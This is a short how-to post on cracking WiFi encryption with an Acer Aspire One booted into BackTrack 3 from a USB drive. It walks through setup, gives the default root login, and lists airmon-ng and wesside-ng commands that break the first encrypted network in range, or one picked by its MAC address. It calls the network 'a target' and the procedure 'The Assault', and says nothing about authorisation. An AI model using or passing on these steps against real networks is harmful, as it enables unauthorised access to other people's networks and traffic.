AA1 WiFi Cracking Quick Instructions
You need:
- Acer Aspire One (AA1)
- 1GB or larger USB thumb drive
- A target
Setup:
- Download BackTrack 3 (torrent here)
- Uncompress ISO with favorite application (I prefer IZArc)
- Copy BT3 and BOOT folders to the thumb drive
- Start a command prompt and enter the following, with X being the letter of your thumb drive (NOTE: make sure when you run bootinst that it specifies the correct drive letter)
- X:
- cd boot
- bootinst
The Assault:
- Restart the AA1
- When the initial BIOS screen starts, press F12 a couple of times
- Select your thumb drive from the list
- On the first menu, choose the fourth option
- Press the space bar when it gripes about not having the right video settings
- Wait for the login prompt.
- Log in with the username root and a password of toor
- Type the following commands to break the first encrypted connection it comes across:
- airmon-ng stop ath0
- airmon-ng start wifi0
- wesside-ng -i ath0
That’s pretty much it. You sit and wait for it to find a connection, sniff the data and bust it wide open. I’ve seen this take as little as 1.5 minutes all the way up to 4-5 hours, it all depends on the traffic on the network.
For a more precise attack you can specify an access point by its MAC address by adding -v 00:00:00:00:00:00 to the last command, replacing the 00:00:00 etc with the actual MAC address so it looks something like this:
wesside-ng -v 12:34:56:78:90:ab -i ath0
To find the MAC address of an access point, use something like netstumbler for Windows XP or inSSIDer for Vista/Windows 7.
